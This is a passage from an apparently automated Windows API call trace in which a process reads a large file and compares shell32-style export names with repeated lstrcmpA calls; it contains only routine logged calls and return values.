(hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0152.883] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0152.883] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0152.883] GetProcessHeap () returned 0x4d0000 [0152.883] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1587258) returned 0x400d040 [0153.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0153.388] ReadFile (in: hFile=0x140, lpBuffer=0x400d040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x400d040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0155.254] CloseHandle (hObject=0x140) returned 1 [0155.254] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0155.255] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0155.255] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0155.255] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0155.255] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0155.255] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0155.255] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0155.255] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0155.255] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.255] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0155.255] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0155.255] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0155.255] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.255] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0155.255] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.256] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0155.256] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.344] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0155.344] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0155.344] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0155.345] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0155.345] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0155.345] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.346] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0155.347] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.347] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0155.348] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0155.349] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.350] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0155.351] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0155.351] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0155.351] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0155.351] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.351] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0155.352] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0155.353] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0155.353] lstrcmpA 